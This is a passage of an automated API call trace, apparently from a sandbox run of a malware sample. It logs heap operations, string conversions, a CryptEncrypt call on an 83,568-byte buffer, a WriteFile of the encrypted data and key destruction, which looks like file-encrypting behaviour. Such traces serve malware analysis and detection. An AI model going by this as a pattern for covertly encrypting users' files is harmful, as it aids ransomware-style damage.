(HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ff8 [0152.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0152.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0152.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0152.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0152.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0152.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0152.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0152.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0152.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0152.235] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0152.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0152.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0152.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0152.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0152.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0152.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0152.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ff8 | out: hHeap=0x2af0000) returned 1 [0152.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0152.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0152.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0152.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0152.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0152.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0152.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0152.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0152.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0152.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0152.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0152.236] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0152.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0152.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa510 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74280 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0152.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0152.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0152.237] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0152.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0152.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0152.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0152.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0152.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74280 | out: hHeap=0x2af0000) returned 1 [0152.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0152.238] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.238] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0152.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0152.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0152.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0152.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d46c0 | out: hHeap=0x2af0000) returned 1 [0152.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0152.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0152.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0152.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0152.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0152.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0152.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0152.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0152.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0152.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.242] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0152.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0152.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0152.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0152.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0152.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0152.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0152.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0152.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0152.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0152.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa4b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0152.243] CryptEncrypt (in: hKey=0x9e1af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x14669, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x14670) returned 1 [0152.243] CharLowerBuffW (in: lpsz="byte[83568]", cchLength=0xb | out: lpsz="byte[83568]") returned 0xb [0152.248] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.248] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa438, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0152.288] CryptEncrypt (in: hKey=0x9e1af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d46c0*, pdwDataLen=0x8cef60*=0x14669, dwBufLen=0x14670 | out: pbData=0x37d46c0*, pdwDataLen=0x8cef60*=0x14670) returned 1 [0152.292] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0152.292] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0152.292] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0152.292] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0152.292] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.292] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.300] WriteFile (in: hFile=0x4a4, lpBuffer=0x2ac3a88*, nNumberOfBytesToWrite=0x14670, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ac3a88*, lpNumberOfBytesWritten=0x8cf5e4*=0x14670, lpOverlapped=0x0) returned 1 [0152.302] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0152.302] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0152.302] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.302] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.312] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0152.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa258, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0152.313] CryptDestroyKey (hKey=0x9e1af8) returned 1 [0152.313] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0152.313] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0152.313] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0152.313] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0152.313] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.313] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.313] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0152.313] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0152.313] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0152.313] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0152.313] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.313] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.313] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.313] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.313] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0152.313] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0152.313] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.313] WideCharToMultiByte (in: 